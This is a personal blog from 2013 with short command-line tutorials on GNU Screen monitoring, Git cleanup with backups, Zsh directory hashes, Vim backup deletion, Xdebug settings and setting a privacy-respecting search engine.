    There’s not a great deal to be seen here. As it tells you right on Yubico’s site, the device presents as a keyboard and it “types” out its key when you press the button, adding another long and complex password to combine with the long and complex password that you’re already using.

    Keep in mind that this device is unable to protect you from keyloggers, some of which are hardware-based. It’s critically important that you are very, very careful about where you’re sticking your Yubikey. Even Yubico cannot protect us from ourselves.

    Tags: , , , ,
    Permalink: 20130604.yay.yubico.yubikey

    Thu, 30 May 2013

    Making ixquick your default search engine

    In this writer’s opinion, it is vitally important that we take reasonable measures now to help ensure anonymity, lest we create a situation where privacy no longer exists and the simple want of it becomes suspicious.

    Here’s how to configure your browser to automatically use a search engine that respects your privacy.


    Chrome:
    1. Click Settings.
    2. Click “Set pages” in the “On startup” section.
    3. Enter https://ixquick.com/eng/ in the “Add a new page” text field.
    4. Click OK.
    5. Click “Manage search engines…”
    6. At the bottom of the “Search Engines” dialog, click in the “Add a new search engine” field.
    7. Enter
    8. Click “Make Default”.
    9. Click “Done”.


    Firefox:
    1. Click the Tools Menu.
    2. Click Options.
    3. Click the General tab.
    4. In “When Firefox Starts” dropdown, select “Show my home page”.
    5. Enter https://ixquick.com/eng/ in the “Home Page” text field.
    6. Click one of the English options here.
    7. Check box for “Start using it right away.”
    8. Click “Add”.


    Opera:
    1. Click “Manage Search Engines”
    2. Click “Add”
    3. Enter
      Name: ixquick
      Keyword: x
      Address: https://ixquick.com/do/search?lui=english&language=english&cat=web&query=%s
    4. Check “Use as default search engine”
    5. Click “OK”

    Internet Explorer:

        _     ___  _ __        ___   _ _____ ___ 
       | |   / _ \| |\ \      / / | | |_   _|__ \
       | |  | | | | | \ \ /\ / /| | | | | |   / /
       | |__| |_| | |__\ V  V / | |_| | | |  |_| 
       |_____\___/|_____\_/\_/   \___/  |_|  (_) 
      (This is not a good strategy for privacy.)



    You are now one step closer to not having every motion on the Internet recorded.

    This is a relatively small measure, though. You can improve your resistance to prying eyes (e.g., browser fingerprinting) by using the Torbrowser Bundle, or even better, Tails, and routing your web usage through Tor, i2p, or FreeNet.

    If you would like more on subjects like anonymyzing, privacy and security then drop me a line via email or Bitmessage me: BM-2D9tDkYEJSTnEkGDKf7xYA5rUj2ihETxVR

    Tags: , , , , , , , , , , , , , ,
    Permalink: 20130530.hey.you.get.offa.my.data

    Thu, 23 May 2013

    GNU Screen: Roll your own system monitor

    Working on remote servers, some tools are practically ubiquitous — while others are harder to come by. Even if you’ve the authority to install your preferred tools on every server you visit, it’s not always something you want to do. If you’ve hopped on to a friend’s server just to troubleshoot a problem, there is little reason to install tools that your friend is not in the habit of using. Some servers, for security reasons, are very tightly locked down to include only a core set of tools, to complicate the job of any prying intruders. Or perhaps it is a machine that you normally use through a graphical interface but on this occasion you need to work from the CLI.

    These are very compelling reasons to get comfortable, at the very least, with tools like Vim, mail, grep and sed. Eventually, you’re likely to encounter a situation where only the classic tools are available. If you aren’t competent with those tools, you’ll end up facing the obstacle of how to get files from the server to your local environment where you can work and, subsequently, how to get the files back when you’re done. In a secured environment, this may not be possible without violating protocols.

    Let’s take a look at how we can build a makeshift system monitor using some common tools. This particular configuration is for a server running PHP and MySQL, with the tools htop and mytop installed. These can easily be replaced with top and a small script to run SHOW FULL PROCESSLIST, if needed (a stand-in is sketched below). The point here is illustrative: a template to be modified according to each specific environment.
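    If mytop isn’t available, a rough replacement for that window can be as simple as the following, assuming a ~/.my.cnf supplies the MySQL credentials:

    watch -d 'mysql -e "SHOW FULL PROCESSLIST"'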

    (Note: I generally prefer tmux to Gnu Screen but screen is the tool more likely to be already installed, so we’ll use it for this example.)

    We’re going to make a set of windows, defined by a configuration file, to help us keep tabs on what is happening in this system. In so doing, we’ll be using the well-known tools less and watch. More specifically, less +F, which tells less to “scroll forward”. In other words, less will continue to read the file, making sure any new lines are added to the display. You can exit this mode with CTRL+c, search the file (/), quit (q) or get back into scroll-forward mode with another uppercase F.

    Using watch, we’ll include the “-d” flag which tells watch we want to highlight any changes (differences).

    We will create a configuration file for screen by typing:

    > vim monitor.screenrc

    In the file, paste the following:

    # Screen setup for system monitoring
    # screen -c monitor.screenrc
    hardstatus alwayslastline
    hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{=kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{B}%Y-%m-%d %{W}%c %{g}]'

    screen -t htop 0 htop
    screen -t mem 1 watch -d "free -t -m"
    screen -t mpstat 2 watch -d "mpstat -A"
    screen -t iostat 3 watch -d "iostat"
    screen -t w 4 watch -d "w"
    screen -t messages 5 less +F /var/log/messages
    screen -t warn 6 less +F /var/log/warn
    screen -t database 7 less +F /srv/www/log/db_error
    screen -t mytop 8 mytop
    screen -t php 9 less +F /srv/www/log/php_error

    (Note: -t sets the title, then the window number, followed by the command running in that window)

    Save the file (:wq) or, if you’d prefer, you can grab a copy by right-clicking and saving this file.

    Then we will execute screen using this configuration, as noted in the comment:

    > screen -c monitor.screenrc

    Then you can switch between windows using CTRL+a, n (next) or CTRL+a, p (previous).
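    You can also jump straight to a window by number (CTRL+a, then the digit), or detach with CTRL+a, d and leave everything running, picking the session back up later with:

    > screen -r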

    I use this technique on my own computers, running in a TTY different from the one used by X. If the graphical interface should get flaky, I can simply switch to that TTY (e.g., CTRL+ALT+F5) to see what things are going on — and take corrective actions, if needed.

    Tags: , , , , , , , , , ,
    Permalink: 20130523.gnu.screen.system.monitor

    Mon, 20 May 2013

    Debugging PHP with Xdebug

    I have finished (more-or-less) making a demo for the Xdebug togglin’ add-on/extension that I’ve developed.

    One hundred percent of the feedback about this project has been from Chrome users. Therefore, the Chrome extension has advanced with the new features (v2.0), allowing selective enabling and disabling of portions of Xdebug’s output. That is, you can set Xdebug to firehose mode (spitting out everything) and then squelch anything not immediately needed at the browser layer. The other information remains present, hidden in the background, available if you decide that you need to have a look.

    The Firefox version is still at v1.2 but will be brought up to speed as time permits.

    If you want that firehose mode for Xdebug, here’s a sample of some settings for your configuration ‘.ini’ file.
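    Directives along these lines (Xdebug 2.x names; trim to taste) turn most of the output on:

    xdebug.default_enable = 1
    xdebug.collect_params = 4
    xdebug.collect_vars = on
    xdebug.collect_return = on
    xdebug.collect_assignments = on
    xdebug.show_local_vars = on
    xdebug.show_mem_delta = on
    xdebug.dump_globals = on
    xdebug.dump.SERVER = REQUEST_URI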

    The demo is here.

    Tags: , , , , , , ,
    Permalink: 20130520.debugging.php.with.xdebug

    Wed, 15 May 2013

    Git: an untracked mess?

    There may be times when you find your Git repository burdened with scads of untracked files left aside while twiddling, testing bug patches, or what-have-youse.

    For the especially scatter-brained among us, these things can go unchecked until a day when the useful bits of a git status scroll off the screen due to utterly unimportant stuff. Well, hopefully unimportant.

    But we’d better not just cleave away everything that we haven’t checked in. You wonder:
    What if there’s something important in one of those files?

    You are so right!

    Let’s fix this!

    Firstly, we want a solution that’s reproducible. Only want to invent this wheel once, right?

    Let’s begin with the play-by-play:

    Git, we want a list of what isn’t tracked: git ls-files -o --exclude-standard -z

    We’ll back these files up in our home directory (~), using CPIO, but we don’t want a poorly-named directory or finding anything will become its own obstacle. So we’ll use the current date (date +%Y-%m-%d), directory (pwd) and branch we’re using (git branch) and we’ll twist all of it into a meaningful, but appropriate, directory name using sed. Since git ls-files -z separates the names with NUL characters, we also hand cpio the matching -0 flag (GNU cpio): git ls-files -o --exclude-standard -z | cpio -pmdu0 ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/

    Then tell Git to remove the untracked files and directories: git clean -d -f

    Ahhhh… Much better. Is there anything left out? Perhaps. What if we decide that moving these files away was a mistake? The kind of mistake that breaks something. If we realize right away, it’s easily-enough undone. But what if we break something and don’t notice for a week or two? It’d probably be best if we had an automated script to put things back the way they were. Let’s do that.

    Simple enough. We’ll just take the opposite commands and echo them into a script to be used in case of emergency.

    Create the restore script (restore.sh), to excuse faulty memory: echo "(cd ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/; find . -type f \( ! -iname 'restore.sh' \) | cpio -pdm `pwd`)" > ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/restore.sh

    Make the restore script executable: chmod u+x ~/untracked-git-backup-`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`/restore.sh

    Lastly, the magic, compressed into one line that will stop if any command does not report success: a='untracked-git-backup-'`date +%Y-%m-%d`.`pwd | sed 's,^\(.*/\)\?\([^/]*\),\2,'`.`git branch | grep "*" | sed "s/* //"`; git ls-files -o --exclude-standard -z | cpio -pmdu0 ~/$a/ && git clean -d -f && echo "(cd ~/$a/; find . -type f \( ! -iname 'restore.sh' \) | cpio -pdm `pwd`)" > ~/$a/restore.sh && chmod +x ~/$a/restore.sh; unset a
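    The same steps, spread out into a function that could live in .zshrc or .bashrc (a sketch; it assumes GNU cpio for the -0 flag):

    untracked_backup() {
        # Name the backup directory after the date, the repo directory and the current branch
        local a="untracked-git-backup-$(date +%Y-%m-%d).$(basename "$(pwd)").$(git branch | grep '*' | sed 's/* //')"
        # Copy the untracked files out of the repository (-0 matches git's -z)...
        git ls-files -o --exclude-standard -z | cpio -pmdu0 ~/"$a"/ &&
        # ...remove them from the working tree...
        git clean -d -f &&
        # ...and leave behind a script that can put everything back
        echo "(cd ~/$a/; find . -type f \( ! -iname 'restore.sh' \) | cpio -pdm $(pwd))" > ~/"$a"/restore.sh &&
        chmod u+x ~/"$a"/restore.sh
    }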

    Tags: , , , ,
    Permalink: 20130515.git.untracked.mess

    Mon, 13 May 2013

    Zsh and hash

    Documentation for this one seems a bit hard to come by but it is one of the things I love about Zsh.

    I’ve seen many .bashrc files that have things like:
    alias www='cd /var/www'
    alias music='cd /home/j0rg3/music'

    And that’s a perfectly sensible way to make life a little easier, especially if the paths are very long.

    In Zsh, however, we can use the hash command and the shortcut we get from it works fully as a path. In other words, using the version above, if we want to edit ‘index.html’ in the ‘www’ directory, we would have to issue the shortcut to get there and then edit the file, in two steps:
    > www
    > vim index.html

    The improved version in .zshrc would look like:
    hash www=/var/www
    hash -d www=/var/www

    Then, at any time, you can use tilde (~) and your shortcut in place of path.
    > vim ~www/index.html

    Even better, it integrates with Zsh’s robust completions so you can, for example, type cd ~www/ and then use the tab key to cycle through subdirectories and files.

    On this system, I’m using something like this:
    hash posts=/home/j0rg3/weblog/posts
    hash -d posts=/home/j0rg3/weblog/posts

    Then we can make a function to create a new post, to paste into .zshrc. Since we want to be able to edit and save while we are working, without partial posts becoming visible, we’ll use an extra .tmp extension at the end:
    post() { vim ~posts/`date +%Y-%m`/`date +%Y%m%d`.$1.txt.tmp }

    [ In-line date command unfamiliar? See earlier explanation ]

    But, surely there is going to be a point when we need to save a post and finish it later. For now, let’s assume that only a single post will be in limbo at any time. We definitely don’t want to have to remember the exact name of the post — and we don’t want to have hunt it down every time.

    We can make those things easier like this:
    alias resume='vim `find ~posts/ -name "*.txt.tmp"`'
    (Note the single quotes: they keep the find from running until you actually type resume, rather than when .zshrc is read.)

    Now, we can just enter resume and the system will go find the post we were working on and open it up for us to finish. The file will need the extension renamed from .txt.tmp to only .txt to publish the post but, for the sake of brevity, we’ll think about that (and having multiple posts in editing) on another day.

    Tags: , , , ,
    Permalink: 20130513.zsh.and.hash

    Wed, 08 May 2013

    Deleting backup files left behind by Vim

    It’s generally a great idea to have Vim keep backups. Once in a while, they can really save your bacon.

    The other side of that coin, though, is that they can get left behind here and there, eventually causing aggravation.

    Here’s a snippet to find and eliminate those files from the current directory down:

    find ./ -name '*~' -exec rm '{}' \; -print -or -name ".*~" -exec rm {} \; -print
    This uses find, from the current directory down (./), to execute an rm statement on every file whose name ends in a tilde (~), hidden or not, printing each name as it removes it.
    Alternatively, you could just store your backups elsewhere. In Vim, use :help backupdir for more information.
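    If you would rather keep the backups out of your working directories entirely, something like this in ~/.vimrc does it (the directory has to exist already):

    set backup
    set backupdir=~/.vim/backup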

    Tags: , , , ,
    Permalink: 20130508.delete.vim.backups

    Tue, 07 May 2013

    Welcome, traveler.

    Thanks for visiting my little spot on the web. This is a Blosxom ‘blog which, for those who don’t know, is a CGI written in Perl using the file-system (rather than a database).

    To the CLI-addicted, this is an awesome little product. Accepting, of course, that you’re going to get under the hood if you’re going to make it the product you want. After some modules and hacking, I’m pleased with the result.

    My posts are just text files, meaning I start a new one like: vim ~posts/`date +%Y%m%d`.brief.subject.txt

    Note: the back-ticks (`) tell the system that you want to execute the command between ticks, and dynamically insert its output into the command. In this case, the command date with these parameters:
    1. (+) we’re going to specify a format
    2. (%Y) four-digit year
    3. (%m) two-digit month
    4. (%d) two-digit day
    That means the command above will use Vim to edit a text file named ‘20130507.brief.subject.txt’ in the directory I have assigned to the hash of ‘posts’. (using hash this way is a function of Zsh that I’ll cover in another post)

    In my CLI-oriented ‘blog, I can sprinkle in my own HTML or use common notation like wrapping a word in underscores to have it underlined, forward-slashes for italics and asterisks for bold.

    Toss in a line that identifies tags and, since Perl is the beast of Regex, we pick up the tags and make them links, meta-tags, etc.

    Things here are likely to change a lot at first, while I twiddle with CSS and hack away at making a Blosxom that perfectly fits my tastes — so don’t be too alarmed if you visit and things look a tad wonky. It just means that I’m tinkering.

    Once the saw-horses have been tucked away, I’m going to take the various notes I’ve made during my years in IT and write them out, in a very simple breakdown, aimed at sharing these with people who know little about how to negotiate the command line. The assumption here is that you have an interest in *nix/BSD. If you’ve that and the CLI is not a major part of your computing experience, it probably will be at some point. If you’re working on systems remotely, graphical interfaces often just impede you.

    Once you’ve started working on remote machines, the rest is inevitable. You can either remember how to do everything two ways, through a graphical interface and CLI — or just start using the CLI for everything.

    So let’s take a little journey through the kinds of things that make me love the CLI.

    Tags: , , , , , , , , ,
    Permalink: 20130507.greetings